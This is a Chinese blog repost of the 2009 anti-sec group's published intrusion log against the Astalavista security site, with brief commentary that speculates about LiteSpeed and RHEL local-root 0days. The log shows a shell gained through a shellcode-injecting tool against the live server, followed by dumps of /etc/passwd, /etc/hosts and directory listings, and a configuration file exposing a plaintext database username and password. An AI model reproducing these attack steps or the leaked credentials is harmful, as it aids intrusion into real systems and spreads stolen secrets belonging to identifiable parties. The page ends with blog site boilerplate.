Astalavista被蹂躏过程 转载自baoz net

分享一下我老师大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

               

里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看http://www.litespeedtech.com/litespeed-web-server-features.html

[root@front3 ~]# curl -I litespeedtech.com
HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed

另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-

有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。

 

 /  _  /  /   _____//__    ___/  _  / |    |     /  _  /   / /   /|   |/   _____//__    ___/  _  / 
/  /_/  / /_____  /   |    | /  /_/  /|    |    /  /_/  /   Y   / |   |/_____  /   |    | /  /_/  /
/    |    //        /  |    |/    |    /    |___/    |    /     /  |   |/        /  |    |/    |    /
/____|__  /_______  /  |____|/____|__  /_______ /____|__  //___/   |___/_______  /  |____|/____|__  /
        //        //                 //        //       //                     //                 //
                                  The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

From < <bstyle=”color:black;background-color:#ffff66″>http</b>://<bstyle=”color:black;background-color:#ffff66″>astalavista</b>.<bstyle=”color:black;background-color:#ffff66″>com</b>/faq>:
>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of homeusers, worldwide companies and corporations, educational and non-profitorganizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis forthe past couple of years, contributing in various ways, or requestingservices and information.

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the “community” but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.

We wanted to see how good that “team of security and IT professionals” really is.

Let’s begin.

anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner…
LiteSpeed
[+] Injecting shellcode…
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMPThu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1       localhost.localdomain   localhost
::1     localhost6.localdomain6 localhost6
80.74.154.172           asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache     4096 May 28 17:06 .
drwx–x–x 11 com com        4096 Jun 25  2008 ..
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
drwxrwxrwx  2 com com        4096 May 19 00:50 config
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
drwxr-xr-x 34 com com        4096 May 28 16:30 modules
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com        4096 May 28 17:06 _new
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam

sh-3.2$ head -20 index.php
<?php

/**
* The main page for the CMS
* @copyright   CONTREXX CMS - COMVATION AG
* @author      Comvation Development Team
* @version     v1.0.9.10.1 stable
* @package        contrexx
* @subpackage    core
* @link        http://www.contrexx.com/ contrexx homepage
* @since       v0.0.0.0
* @todo        Capitalize all class names in project
* @uses        /config/configuration.php
* @uses        /config/settings.php
* @uses        /config/version.php
* @uses        /core/API.php
* @uses        /core_modules/cache/index.class.php
* @uses        /core/error.class.php
* @uses        /core_modules/banner/index.class.php
* @uses        /core_modules/contact/index.class.php

sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx  2 com com    4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php

sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset']

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值